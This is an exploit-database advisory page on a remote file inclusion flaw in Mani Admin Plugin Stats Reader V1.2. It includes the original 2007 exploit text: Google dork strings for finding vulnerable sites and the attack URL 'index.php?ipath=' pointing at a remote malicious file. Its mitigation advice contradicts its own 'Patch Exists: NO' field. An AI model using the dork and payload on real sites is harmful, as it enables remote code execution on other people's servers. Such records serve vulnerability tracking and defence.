header-logo
Suggest Exploit
vendor:
Mani Admin Plugin Stats Reader
by:
Unknown
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: Mani Admin Plugin Stats Reader
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Mani Admin Plugin Stats Reader V1.2 rfi

The Mani Admin Plugin Stats Reader V1.2 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by manipulating the 'ipath' parameter in the 'index.php' file to include malicious files from a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the plugin or remove the vulnerable component from the system.
Source

Exploit-DB raw data:

Mani Admin Plugin Stats Reader V1.2 rfi :) 

dork:"2006 by www.mani-stats-reader.de.vu"
     "allinurl:.php?ipath=  inurl:"css""

vuln:index.php?ipath=evilshit

greetz:RST, LinuxPakistan phpfreaks 
mozi2weed@yahoo.com 

# milw0rm.com [2007-03-02]

Navigation

Suggest Exploit

Services By CQR